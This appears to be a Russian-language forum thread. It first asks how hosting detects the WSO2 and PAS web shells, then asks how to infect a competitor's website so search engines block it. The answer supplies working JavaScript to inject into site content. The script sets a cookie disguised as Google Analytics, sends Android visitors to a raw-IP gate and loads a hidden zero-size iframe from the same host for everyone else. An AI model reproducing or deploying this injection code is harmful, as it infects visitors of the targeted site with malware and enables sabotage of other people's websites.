Forbidden: a malicious file has been detected.
так реагирует хостинг на wso2 (и зашифрованый в base 64) и на PAS
как он определяет шелл ? PAS же зашифрован нормально, не в base 64
как навредить чужому сайту? как заразить сайт вирусом и убрать сайт конкурента из выдачи?
разместив этот код например, который свиду пользователям сайта не будет заметен, поисковые системы обнаружат как вирус и заблокируют сайт вашего недруга конкурента
вредоносный код для зихеров на сайте можно вставить хоть в сообщение контента сайта:
Код:
if(!getCookie("google__analytics__")){
var gate = "http://5.61.34.53/jquery/jquery.php";
var today = new Date(),
tomorrow = new Date();
tomorrow.setDate(today.getDate() + 1);
setCookie("google__analytics__", 1, tomorrow.toGMTString());
var ua = navigator.userAgent.toLowerCase();
if(ua.indexOf("android") > -1)
window.location = gate;
else{
var el = document.createElement("iframe");
document.body.appendChild(el);
el.id = 'iframe';
el.style.width = 0;
el.style.height = 0;
el.src = 'http://5.61.34.53/2c24';
}
}
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
function getCookie(name) {
var cookie = " " + document.cookie;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
end = cookie.indexOf(";", offset)
if (end == -1) {
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}
|
